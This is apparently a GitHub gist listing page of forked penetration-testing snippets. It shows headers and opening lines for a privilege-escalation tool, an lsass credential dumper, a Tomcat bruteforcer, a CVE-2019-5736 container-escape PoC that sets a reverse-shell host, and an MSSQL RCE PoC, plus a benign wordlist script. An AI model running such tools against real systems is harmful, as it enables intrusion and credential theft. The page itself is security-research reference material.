Santhosh Baswa P3t3rp4rk3r

@P3t3rp4rk3r
P3t3rp4rk3r / defcon29-recon.md
Created August 16, 2021 07:47 — forked from salaheldinaz/defcon29-recon.md
DEFCON29 Recon Village Toots & Resources
P3t3rp4rk3r / wordgrab.sh
Created May 8, 2020 16:57 — forked from gwen001/wordgrab.sh
create a wordlist from the target itself
# with user-agent
# credits @fo0_
# usage: wordgrab example.com  (prints a deduplicated wordlist built from the page's visible text)
wordgrab() {
url="$1"
tmpfile="$(date "+%s")"
# fetch the page with a browser-like user-agent, strip HTML, keep alphanumeric tokens,
# lowercase them and trim non-alphanumeric characters from both ends
curl -sLk -m 3 -A "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" "https://$url" \
  | html2text | grep -Eio "[0-9a-zA-Z-]+" | tr '[:upper:]' '[:lower:]' \
  | sed -r "s/^[^a-z]+//g" | sed -r "s/[^a-z0-9]+$//g" | sort -fu \
  | tee -a "$tmpfile" | tr '-' '.' | tee -a "$tmpfile" | tr "." "\n" >> "$tmpfile"
# output the original tokens, their dash-to-dot variants and the dot-split parts, deduplicated
sort -fu "$tmpfile"
rm "$tmpfile"
}
P3t3rp4rk3r / GetSystem.cs
Created April 19, 2020 04:46 — forked from mvelazc0/GetSystem.cs
Escalates to SYSTEM leveraging OpenProcess, OpenProcessToken and ImpersonateLoggedOnUser. https://attack.mitre.org/beta/techniques/T1134/. Needs to run as a High Integrity proc. Needs SeDebugPrivilege
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
namespace GetSystem
{
class Program
{
P3t3rp4rk3r / php-curl-crlf-injection.mkd
Created January 5, 2020 13:17 — forked from tomnomnom/php-curl-crlf-injection.mkd
CRLF Injection Into PHP's cURL Options
I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

P3t3rp4rk3r / autoProc.py
Created August 27, 2019 08:43 — forked from knavesec/autoProc.py
Automatic lsass dumper
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
P3t3rp4rk3r / disposableemailproviders
Created March 24, 2019 04:06
Free disposable email providers
P3t3rp4rk3r / tomcat_bruteforce.py
Created March 8, 2019 17:35 — forked from th3gundy/tomcat_bruteforce.py
Tomcat manager console bruteforce
"""
Tomcat bruteforce
Author: @itsecurityco
"""
import os
import sys
import getopt
import base64
import requests
P3t3rp4rk3r / parse_austria.php
Created February 18, 2019 14:26 — forked from geek-at/parse_austria.php
Parsing ip data from a file
<?php
$infile = 'austria.csv';
$outfile = 'austria.ips';
$fp = fopen($outfile,'w');
$handle = fopen($infile, "r");
if ($handle)
{
while (($line = fgets($handle)) !== false) {
$line = trim($line);
P3t3rp4rk3r / cve-2019-5736.py
Created February 13, 2019 11:34 — forked from singe/cve-2019-5736.py
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
P3t3rp4rk3r / bad_sequel.py
Created January 29, 2019 14:15 — forked from 3xocyte/bad_sequel.py
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use